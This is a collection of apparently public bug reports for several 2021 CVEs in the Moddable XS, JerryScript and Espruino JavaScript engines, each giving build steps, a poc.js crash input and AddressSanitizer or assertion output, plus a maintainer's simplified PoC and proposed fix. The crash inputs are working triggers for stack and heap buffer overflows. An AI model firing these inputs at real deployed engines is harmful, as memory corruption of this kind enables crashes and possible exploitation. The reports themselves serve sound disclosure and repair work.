Moddable SDK v11.5.0 was discovered to contain a stack buffer overflow via the component __interceptor_strcat.

**Moddable-XS revision**

Commit: 2f93df29

Version: 11.5.0 32 4

**Build environment**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

cd  ~/moddable/xs/makefiles/lin
#debug
make -f xst.mk

**Test case**

//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIndlYnBhY2s6Ly8vd2VicGFjay9ib290c3RyYXAgNDJlMDQyN2ExYTZlMzk3NTdjOGMiLCJ3ZWJwYWNrOi8vLy4vY29kZV9pbmxpbmVfb3JpZ2luYWwuanMiXSwibmFtZXMiOltdLCJtYXBwaW5ncyI6IjtBQUFBO0FBQ0E7O0FBRUE7QUFDQTs7QUFFQTtBQUNBO0FBQ0E7QUFDQTtBQUNBO0FBQ0E7QUFDQTtBQUNBO0FBQ0E7QUFDQTs7QUFFQTtBQUNBOztBQUVBO0FBQ0E7O0FBRUE7QUFDQTtBQUNBOzs7QUFHQTtBQUNBOztBQUVBO0FBQ0E7O0FBRUE7QUFDQSxtREFBMkMsY0FBYzs7QUFFekQ7QUFDQTtBQUNBO0FBQ0E7QUFDQTtBQUNBO0FBQ0E7QUFDQSxhQUFLO0FBQ0w7QUFDQTs7QUFFQTtBQUNBO0FBQ0E7QUFDQSxtQ0FBMkIsMEJBQTBCLEVBQUU7QUFDdkQseUNBQWlDLGVBQWU7QUFDaEQ7QUFDQTtBQUNBOztBQUVBO0FBQ0EsOERBQXNELCtEQUErRDs7QUFFckg7QUFDQTs7QUFFQTtBQUNBOzs7Ozs7OztBQ2hFQTtBQUNBOztBQUVBO0FBQ0E7QUFDQTs7QUFFQTs7QUFFQTtBQUNBO0FBQ0E7O0FBRUEiLCJmaWxlIjoiY29kZV9pbmxpbmVfYnVuZGxlLmpzIiwic291cmNlc0NvbnRlbnQiOlsiIFx0Ly8gVGhlIG1vZHVsZSBjYWNoZVxuIFx0dmFyIGluc3RhbGxlZE1vZHVsZXMgPSB7fTtcblxuIFx0Ly8gVGhlIHJlcXVpcmUgZnVuY3Rpb25cbiBcdGZ1bmN0aW9uIF9fd2VicGFja19yZXF1aXJlX18obW9kdWxlSWQpIHtcblxuIFx0XHQvLyBDaGVjayBpZiBtb2R1bGUgaXMgaW4gY2FjaGVcbiBcdFx0aWYoaW5zdGFsbGVkTW9kdWxlc1ttb2R1bGVJZF0pIHtcbiBcdFx0XHRyZXR1cm4gaW5zdGFsbGVkTW9kdWxlc1ttb2R1bGVJZF0uZXhwb3J0cztcbiBcdFx0fVxuIFx0XHQvLyBDcmVhdGUgYSBuZXcgbW9kdWxlIChhbmQgcHV0IGl0IGludG8gdGhlIGNhY2hlKVxuIFx0XHR2YXIgbW9kdWxlID0gaW5zdGFsbGVkTW9kdWxlc1ttb2R1bGVJZF0gPSB7XG4gXHRcdFx0aTogbW9kdWxlSWQsXG4gXHRcdFx0bDogZmFsc2UsXG4gXHRcdFx0ZXhwb3J0czoge31cbiBcdFx0fTtcblxuIFx0XHQvLyBFeGVjdXRlIHRoZSBtb2R1bGUgZnVuY3Rpb25cbiBcdFx0bW9kdWxlc1ttb2R1bGVJZF0uY2FsbChtb2R1bGUuZXhwb3J0cywgbW9kdWxlLCBtb2R1bGUuZXhwb3J0cywgX193ZWJwYWNrX3JlcXVpcmVfXyk7XG5cbiBcdFx0Ly8gRmxhZyB0aGUgbW9kdWxlIGFzIGxvYWRlZFxuIFx0XHRtb2R1bGUubCA9IHRydWU7XG5cbiBcdFx0Ly8gUmV0dXJuIHRoZSBleHBvcnRzIG9mIHRoZSBtb2R1bGVcbiBcdFx0cmV0dXJuIG1vZHVsZS5leHBvcnRzO1xuIFx0fVxuXG5cbiBcdC8vIGV4cG9zZSB0aGUgbW9kdWxlcyBvYmplY3QgKF9fd2VicGFja19tb2R1bGVzX18pXG4gXHRfX3dlYnBhY2tfcmVxdWlyZV9fLm0gPSBtb2R1bGVzO1xuXG4gXHQvLyBleHBvc2UgdGhlIG1vZHVsZSBjYWNoZVxuIFx0X193ZWJwYWNrX3JlcXVpcmVfXy5jID0gaW5zdGFsbGVkTW9kdWxlcztcblxuIFx0Ly8gaWRlbnRpdHkgZnVuY3Rpb24gZm9yIGNhbGxpbmcgaGFybW9ueSBpbXBvcnRzIHdpdGggdGhlIGNvcnJlY3QgY29udGV4dFxuIFx0X193ZWJwYWNrX3JlcXVpcmVfXy5pID0gZnVuY3Rpb24odmFsdWUpIHsgcmV0dXJuIHZhbHVlOyB9O1xuXG4gXHQvLyBkZWZpbmUgZ2V0dGVyIGZ1bmN0aW9uIGZvciBoYXJtb255IGV4cG9ydHNcbiBcdF9fd2VicGFja19yZXF1aXJlX18uZCA9IGZ1bmN0aW9uKGV4cG9ydHMsIG5hbWUsIGdldHRlcikge1xuIFx0XHRpZighX193ZWJwYWNrX3JlcXVpcmVfXy5vKGV4cG9ydHMsIG5hbWUpKSB7XG4gXHRcdFx0T2JqZWN0LmRlZmluZVByb3BlcnR5KGV4cG9ydHMsIG5hbWUsIHtcbiBcdFx0XHRcdGNvbmZpZ3VyYWJsZTogZmFsc2UsXG4gXHRcdFx0XHRlbnVtZXJhYmxlOiB0cnVlLFxuIFx0XHRcdFx0Z2V0OiBnZXR0ZXJcbiBcdFx0XHR9KTtcbiBcdFx0fVxuIFx0fTtcblxuIFx0Ly8gZ2V0RGVmYXVsdEV4cG9ydCBmdW5jdGlvbiBmb3IgY29tcGF0aWJpbGl0eSB3aXRoIG5vbi1oYXJtb255IG1vZHVsZXNcbiBcdF9fd2VicGFja19yZXF1aXJlX18ubiA9IGZ1bmN0aW9uKG1vZHVsZSkge1xuIFx0XHR2YXIgZ2V0dGVyID0gbW9kdWxlICYmIG1vZHVsZS5fX2VzTW9kdWxlID9cbiBcdFx0XHRmdW5jdGlvbiBnZXREZWZhdWx0KCkgeyByZXR1cm4gbW9kdWxlWydkZWZhdWx0J107IH0gOlxuIFx0XHRcdGZ1bmN0aW9uIGdldE1vZHVsZUV4cG9ydHMoKSB7IHJldHVybiBtb2R1bGU7IH07XG4gXHRcdF9fd2VicGFja19yZXF1aXJlX18uZChnZXR0ZXIsICdhJywgZ2V0dGVyKTtcbiBcdFx0cmV0dXJuIGdldHRlcjtcbiBcdH07XG5cbiBcdC8vIE9iamVjdC5wcm90b3R5cGUuaGFzT3duUHJvcGVydHkuY2FsbFxuIFx0X193ZWJwYWNrX3JlcXVpcmVfXy5vID0gZnVuY3Rpb24ob2JqZWN0LCBwcm9wZXJ0eSkgeyByZXR1cm4gT2JqZWN0LnByb3RvdHlwZS5oYXNPd25Qcm9wZXJ0eS5jYWxsKG9iamVjdCwgcHJvcGVydHkpOyB9O1xuXG4gXHQvLyBfX3dlYnBhY2tfcHVibGljX3BhdGhfX1xuIFx0X193ZWJwYWNrX3JlcXVpcmVfXy5wID0gXCJcIjtcblxuIFx0Ly8gTG9hZCBlbnRyeSBtb2R1bGUgYW5kIHJldHVybiBleHBvcnRzXG4gXHRyZXR1cm4gX193ZWJwYWNrX3JlcXVpcmVfXyhfX3dlYnBhY2tfcmVxdWlyZV9fLnMgPSAwKTtcblxuXG5cbi8vIFdFQlBBQ0sgRk9PVEVSIC8vXG4vLyB3ZWJwYWNrL2Jvb3RzdHJhcCA0MmUwNDI3YTFhNmUzOTc1N2M4YyIsIi8qIEFueSBjb3B5cmlnaHQgaXMgZGVkaWNhdGVkIHRvIHRoZSBQdWJsaWMgRG9tYWluLlxuIGh0dHA6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL3B1YmxpY2RvbWFpbi96ZXJvLzEuMC8gKi9cblxuLy8gT3JpZ2luYWwgc291cmNlIGNvZGUgZm9yIHRoZSBpbmxpbmUgc291cmNlIG1hcCB0ZXN0LlxuLy8gVGhlIGdlbmVyYXRlZCBmaWxlIHdhcyBtYWRlIHdpdGhcbi8vICAgIHdlYnBhY2sgLS1kZXZ0b29sIGlubGluZS1zb3VyY2UtbWFwIGNvZGVfaW5saW5lX29yaWdpbmFsLmpzIGNvZGVfaW5saW5lX2J1bmRsZS5qc1xuXG5cInVzZSBzdHJpY3RcIjtcblxuZnVuY3Rpb24gZigpIHtcbiAgY29uc29sZS5sb2coXCJJJ20gYSBnb2xkZmlzaCB3aXRoIGEgbWVycnkgZmFjZVwiKTtcbn1cblxuZigpO1xuXG5cblxuLy8vLy8vLy8vLy8vLy8vLy8vXG4vLyBXRUJQQUNLIEZPT1RFUlxuLy8gLi9jb2RlX2lubGluZV9vcmlnaW5hbC5qc1xuLy8gbW9kdWxlIGlkID0gMFxuLy8gbW9kdWxlIGNodW5rcyA9IDAiXSwic291cmNlUm9vdCI6IiJ9

**Execution & Output with ASAN**

$ xst poc.js
=================================================================
====ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe2b073ce0 at pc 0x000000449adb bp 0x7ffe2b070e30 sp 0x7ffe2b0705e0
WRITE of size 4372 at 0x7ffe2b073ce0 thread T0
    #0 0x449ada in \_\_interceptor\_strcat (/usr/local/bin/xst+0x449ada)
    #1 0x7df692 in fxLoadScript /root/moddable/xs/sources/xsPlatforms.c:403:4
    #2 0xad2f99 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1385:21
    #3 0xacfa83 in main /root/moddable/xs/tools/xst.c:281:8
    #4 0x7fea1d53cbf6 in \_\_libc\_start\_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #5 0x42ddc9 in \_start (/usr/local/bin/xst+0x42ddc9)

Address 0x7ffe2b073ce0 is located in stack of thread T0 at offset 4128 in frame
    #0 0xacdaef in main /root/moddable/xs/tools/xst.c:201

  This frame has 4 object(s):
    \[32, 4128) 'path' (line 204)
    \[4256, 4300) '\_creation' (line 244) <== Memory access at offset 4128 partially underflows this variable
    \[4336, 4592) '\_\_HOST\_JUMP\_\_' (line 261) <== Memory access at offset 4128 partially underflows this variable
    \[4656, 4912) '\_\_JUMP\_\_' (line 264) <== Memory access at offset 4128 partially underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions \*are\* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/usr/local/bin/xst+0x449ada) in \_\_interceptor\_strcat
Shadow bytes around the buggy address:
  0x100045606740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100045606750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100045606760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100045606770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100045606780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=\>0x100045606790: 00 00 00 00 00 00 00 00 00 00 00 00\[f2\]f2 f2 f2
  0x1000456067a0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 00 00 00 00
  0x1000456067b0: 00 04 f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00
  0x1000456067c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000456067d0: 00 00 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 00 00
  0x1000456067e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==77303==ABORTING

**No-ASAN Output**

SyntaxError: (host): invalid script
\*\*\* stack smashing detected \*\*\*: <unknown\> terminated
\[1\]   abort      xst poc.js

Credits: Found by OWL337 team.

CVE-2021-46334: Stack-buffer-overflow (/usr/local/bin/xst+0x449ada) in __interceptor_strcat with ASAN · Issue #760 · Moddable-OpenSource/moddable

There is an Assertion 'opts & PARSER_CLASS_LITERAL_CTOR_PRESENT' failed at /parser/js/js-parser-expr.c(parser_parse_class_body) in JerryScript 3.0.0.

**JerryScript revision**

Commit: a6ab5e9

Version: v3.0.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86\_64)

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20

**Test case**poc.js

    
    function assert(a, b) {
      if (a != b)
        throw "FAIL";
    }
    
    function JSEtest(script) {
      try {
        eval(script);
      } catch (e) {
        return e;
      }
    }
    
    assert(JSEtest("class C1 { async;constructor() { } }"), "SyntaxError: Cannot declare an async method named 'constructor'.");
    assert(JSEtest("class C1 { *constructor() { } }"), "SyntaxError: Cannot declare a generator function named 'constructor'.");
    assert(JSEtest("class C1 { async *constructor() { } }"), "SyntaxError: Cannot declare an async generator method named 'constructor'.");
​**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc.js

ICE: Assertion 'opts & PARSER\_CLASS\_LITERAL\_CTOR\_PRESENT' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser\_parse\_class\_body):656.
Error: ERR\_FAILED\_INTERNAL\_ASSERTION
\[1\]    31519 abort      jerry poc.js

Credits: Found by OWL337 team.

CVE-2021-46336: Assertion 'opts & PARSER_CLASS_LITERAL_CTOR_PRESENT' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_class_body):656. · Issue #4927 · jerryscript-project/jerryscript

There is an Assertion 'page_p != NULL' failed at /parser/js/js-parser-mem.c(parser_list_get) in JerryScript 3.0.0.

**JerryScript revision**

Commit: a6ab5e9

Version: v3.0.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86\_64)

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20

**Test case**poc.js

    
    var stringSet;
    
    class JSEtest {
      get #test262() { return 'get string'; }
      set #test262(param) { stringSet = param; }
    
      getPrivateReference() {
        return this.#test262;
      }
    
      setPrivateReference(value) {function    this.#test262 = value;
      }
    };
    
    var inst = new JSEtest();
    assert.sameValue(inst.getPrivateReference(), 'get string');
    inst.setPrivateReference('set string');
    assert.sameValue(stringSet, 'set string');
​**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc.js

ICE: Assertion 'page\_p != NULL' failed at jerryscript/jerry-core/parser/js/js-parser-mem.c(parser\_list\_get):279.
Error: ERR\_FAILED\_INTERNAL\_ASSERTION
\[1\]    36899 abort      jerry poc.js

Credits: Found by OWL337 team.

CVE-2021-46337: Assertion 'page_p != NULL' failed at jerryscript/jerry-core/parser/js/js-parser-mem.c(parser_list_get):279.  · Issue #4930 · jerryscript-project/jerryscript

Espruino 2v11.251 was discovered to contain a stack buffer overflow via src/jsvar.c in jsvNewFromString.

**Espruino revision**

Commit: 53108085  
Version: 2v11.251

**Build environment**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CCFLAGS='\-g -fsanitize=address -fno-omit-frame-pointer'
make clean && make

**Test case**

var result \= (new Array(64)."a", "b",expected,actual(new Array(64))).concat(\["H"\]);
var value \= result\[0\];
if (value !== void 0)
    throw "Error" + value;

**Execution & Output**

./Espruino/espruino poc.js

=================================================================
=========ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffef778ec61 at pc 0x55e21c41efe8 bp 0x7ffef778eb70 sp 0x7ffef778eb60
READ of size 1 at 0x7ffef778ec61 thread T0
    #0 0x55e21c41efe7 in jsvNewFromString src/jsvar.c:910
    #1 0x55e21c456e0c in jsvAddNamedChild src/jsvar.c:2581
    #2 0x55e21c52d165 in jspeAddNamedFunctionParameter src/jsparse.c:1442
    #3 0x55e21c5540ee in jspeExpressionOrArrowFunction src/jsparse.c:1469
    #4 0x55e21c555c06 in jspeFactor src/jsparse.c:1622
    #5 0x55e21c53891f in jspeFactorFunctionCall src/jsparse.c:1160
    #6 0x55e21c539f38 in jspePostfixExpression src/jsparse.c:1786
    #7 0x55e21c541192 in jspeBinaryExpression src/jsparse.c:1955
    #8 0x55e21c541192 in jspeConditionalExpression src/jsparse.c:1991
    #9 0x55e21c541192 in jspeAssignmentExpression src/jsparse.c:2050
    #10 0x55e21c541192 in jspeStatementVar src/jsparse.c:2165
    #11 0x55e21c54b6d4 in jspeBlockOrStatement src/jsparse.c:2124
    #12 0x55e21c54da1e in jspParse src/jsparse.c:2136
    #13 0x55e21c55c3ea in jspEvaluateVar src/jsparse.c:2996
    #14 0x55e21c55c3ea in jspEvaluate src/jsparse.c:3026
    #15 0x55e21c36c025 in main targets/linux/main.c:460
    #16 0x7fa0f5814bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #17 0x55e21c36fbc9 in \_start (/root/Espruino/espruino+0x4ebc9)
Address 0x7ffef778ec61 is located in stack of thread T0 at offset 97 in frame
    #0 0x55e21c52cedf in jspeAddNamedFunctionParameter src/jsparse.c:1437
This frame has 1 object(s):
    \[32, 97) 'buf' <== Memory access at offset 97 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions \*are\* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow src/jsvar.c:910 in jsvNewFromString
Shadow bytes around the buggy address:
    0x10005eee9d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10005eee9d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10005eee9d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10005eee9d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10005eee9d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  =\>0x10005eee9d80: f1 f1 f1 f1 00 00 00 00 00 00 00 00\[01\]f2 f2 f2
    0x10005eee9d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10005eee9da0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
    0x10005eee9db0: 00 00 00 00 00 00 00 f2 00 00 00 00 00 00 00 00
    0x10005eee9dc0: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2
    0x10005eee9dd0: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
    Addressable:           00
    Partially addressable: 01 02 03 04 05 06 07
    Heap left redzone:       fa
    Freed heap region:       fd
    Stack left redzone:      f1
    Stack mid redzone:       f2
    Stack right redzone:     f3
    Stack after return:      f5
    Stack use after scope:   f8
    Global redzone:          f9
    Global init order:       f6
    Poisoned by user:        f7
    Container overflow:      fc
    Array cookie:            ac
    Intra object redzone:    bb
    ASan internal:           fe
    Left alloca redzone:     ca
    Right alloca redzone:    cb
=========ABORTING

CVE-2021-46324: Stack-buffer-overflow src/jsvar.c:910 in jsvNewFromString · Issue #2121 · espruino/Espruino

Moddable SDK v11.5.0 was discovered to contain a heap-buffer-overflow via the component __asan_memcpy.

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Moddable-XS revision**

Commit: 2f93df29

Version: 11.5.0 32 4

**Build environment**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

cd  ~/moddable/xs/makefiles/lin
make -f xst.mk

**Test case**

function JSEtest(str, count) {
  while (str.length < ("$1", 1 << 16)) {
      try {
         str += str;
      } catch (e) {}
  }
  return str.substring();
}
var x \= JSEtest("1", 1 << 20);
var y \= JSEtest("$1", 1 << 16);

var exception;
try {
  var \_\_v\_6623 \= x.replace(/(.+)/g, y);
} catch (e) {
  exception \= e;
}

**Execution & Output with ASAN**

$ ./moddable/build/bin/lin/debug/xst poc.js
==113836==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fdb09ffc820 at pc 0x0000004ec9ac bp 0x7ffe814586d0 sp 0x7ffe81457e80
WRITE of size 65536 at 0x7fdb09ffc820 thread T0
    #0 0x4ec9ab in \_\_asan\_memcpy (/usr/local/bin/xst+0x4ec9ab)
    #1 0x915e02 in fxPushSubstitutionString /root/moddable/xs/sources/xsString.c:1995:9
    #2 0x839a57 in fx\_RegExp\_prototype\_replace /root/moddable/xs/sources/xsRegExp.c:834:5
    #3 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7
    #4 0x90d877 in fx\_String\_prototype\_withRegexp /root/moddable/xs/sources/xsString.c:1675:5
    #5 0x8fc277 in fx\_String\_prototype\_replace /root/moddable/xs/sources/xsString.c:1120:6
    #6 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7
    #7 0x8ceaac in fxRunScript /root/moddable/xs/sources/xsRun.c:4766:4
    #8 0xad3231 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387:2
    #9 0xacfa83 in main /root/moddable/xs/tools/xst.c:281:8
    #10 0x7fdb0cd0fbf6 in \_\_libc\_start\_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #11 0x42ddc9 in \_start (/usr/local/bin/xst+0x42ddc9)

0x7fdb09ffc820 is located 0 bytes to the right of 16777248-byte region \[0x7fdb08ffc800,0x7fdb09ffc820)
allocated by thread T0 here:
    #0 0x4edc80 in malloc (/usr/local/bin/xst+0x4edc80)
    #1 0x7dba63 in fxAllocateChunks /root/moddable/xs/sources/xsPlatforms.c:123:9
    #2 0x759641 in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506:11
    #3 0x75876a in fxAllocate /root/moddable/xs/sources/xsMemory.c:170:2
    #4 0x53d89c in fxCreateMachine /root/moddable/xs/sources/xsAPI.c:1382:4
    #5 0xace769 in main /root/moddable/xs/tools/xst.c:259:19
    #6 0x7fdb0cd0fbf6 in \_\_libc\_start\_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310

SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/local/bin/xst+0x4ec9ab) in \_\_asan\_memcpy
Shadow bytes around the buggy address:
  0x0ffbe13f78b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffbe13f78c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffbe13f78d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffbe13f78e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffbe13f78f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\=>0x0ffbe13f7900: 00 00 00 00\[fa\]fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbe13f7910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbe13f7920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbe13f7930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbe13f7940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbe13f7950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\==113836\==ABORTING

**No-ASAN Output**

\[1\]    5720 segmentation fault  xst poc.js

Credits: Found by OWL337 team.

![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=88&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4)

Copy link

Collaborator

**![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=60&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4) **phoddie** commented Dec 28, 2021**

The POC may be simplified to the following:

    var x = "1".repeat(65536);
    var y = "$1".repeat(32768);
    x.replace(/(.+)/g, y);
    

A quick fix is change this line...

l += mxStringLength(capture->value.string);

...to use `fxAddChunkSizes`:

l = fxAddChunkSizes(the, l, mxStringLength(capture->value.string));

But it appears there are other paths where`l` can overflow, so this requires further investigation.

mkellner pushed a commit that referenced this issue

Jan 10, 2022

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

2 participants

 ![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46326: Heap-buf-overflow (/usr/local/bin/xst+0x4ec9ab) in __asan_memcpy · Issue #759 · Moddable-OpenSource/moddable

Espruino 2v10.246 was discovered to contain a stack buffer overflow via src/jsutils.c in vcbprintf.

**Espruino revision**

Commit: 0a9f07a0  
Version: 2v10.246

**Build environment**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CCFLAGS='\-g -fsanitize=address -fno-omit-frame-pointer'
make clean 
make

**Test case**

function JSEtest() {
    let v1 \= 0;
    const v5 \= \[1337\];
    const v6 \= \[\];
    const v7 \= {
        constructor: v6,
        d: parseInt,
        \_\_proto\_\_: v5,
        valueOf: 1782977947,
        e: v5
    };
    let v8 \= v7;
    const v10 \= \[
        v1,
        1337,
        1337,
        1337,
        1337
    \];
    let v11 \= v10;
    let v13 \= v8;
    let v16 \= 5;
    const v20 \= JSON.stringify(v13, v11, v13);
    const v21 \= JSON.parse(v20, v11);
}
JSEtest();

**Execution & Output**

./Espruino/espruino poc.js

=================================================================
ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe05f1053b at pc 0x562494da412c bp 0x7ffe05f0fdc0 sp 0x7ffe05f0fdb0
READ of size 1 at 0x7ffe05f1053b thread T0
    #0 0x562494da412b in vcbprintf src/jsutils.c:751
    #1 0x562494da532a in cbprintf src/jsutils.c:850
    #2 0x562494ff94e0 in jsonNewLine src/jswrap\_json.c:243
    #3 0x562494ff94e0 in jsfGetJSONForObjectItWithCallback src/jswrap\_json.c:267
    #4 0x562494ff6572 in jsfGetJSONWithCallback src/jswrap\_json.c:450
    #5 0x562494ff9b52 in jsfGetJSONWhitespace src/jswrap\_json.c:490
    #6 0x562494ff9b52 in jswrap\_json\_stringify src/jswrap\_json.c:73
    #7 0x562494dad1e7 in jsnCallFunction src/jsnative.c:220
    #8 0x562494db69db in jspeFunctionCall src/jsparse.c:609
    #9 0x562494db7cc7 in jspeFactorFunctionCall src/jsparse.c:1184
    #10 0x562494db8651 in jspePostfixExpression src/jsparse.c:1786
    #11 0x562494dbc208 in jspeBinaryExpression src/jsparse.c:1955
    #12 0x562494dbc208 in jspeConditionalExpression src/jsparse.c:1991
    #13 0x562494dbc208 in jspeAssignmentExpression src/jsparse.c:2050
    #14 0x562494dbc208 in jspeStatementVar src/jsparse.c:2165
    #15 0x562494dc080c in jspeBlockNoBrackets src/jsparse.c:2084
    #16 0x562494db6f3f in jspeFunctionCall src/jsparse.c:796
    #17 0x562494db7cc7 in jspeFactorFunctionCall src/jsparse.c:1184                   
    #18 0x562494db8651 in jspePostfixExpression src/jsparse.c:1786
    #19 0x562494dba35a in jspeBinaryExpression src/jsparse.c:1955
    #20 0x562494dba35a in jspeConditionalExpression src/jsparse.c:1991                 
    #21 0x562494dba35a in jspeAssignmentExpression src/jsparse.c:2050
    #22 0x562494dba35a in jspeExpression src/jsparse.c:2056
    #23 0x562494dc1488 in jspeBlockOrStatement src/jsparse.c:2124
    #24 0x562494dc262e in jspParse src/jsparse.c:2136
    #25 0x562494dca2fd in jspEvaluateVar src/jsparse.c:2992
    #26 0x562494dca2fd in jspEvaluate src/jsparse.c:3022
    #27 0x562494cd0acd in main targets/linux/main.c:460
    #28 0x7f11add79bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #29 0x562494cd33b9 in \_start (/root/Espruino/espruino+0x4c3b9)
Address 0x7ffe05f1053b is located in stack of thread T0 at offset 139 in frame
    #0 0x562494ff98ef in jswrap\_json\_stringify src/jswrap\_json.c:56
This frame has 2 object(s):
\[32, 88) 'it'\[128, 139) 'whitespace' <== Memory access at offset 139 overflows this variable

SUMMARY: AddressSanitizer: stack-buffer-overflow src/jsutils.c:751 in vcbprintf
Shadow bytes around the buggy address:
  0x100040bda050: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2
  0x100040bda060: f2 f2 f2 f2 f2 f2 00 f2 f2 f2 f2 f2 f2 f2 00 f2
  0x100040bda070: f2 f2 f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00
  0x100040bda080: 00 00 f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00
  0x100040bda090: 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00
\=>0x100040bda0a0: 00 f2 f2 f2 f2 f2 00\[03\]f2 f2 00 00 00 00 00 00
  0x100040bda0b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
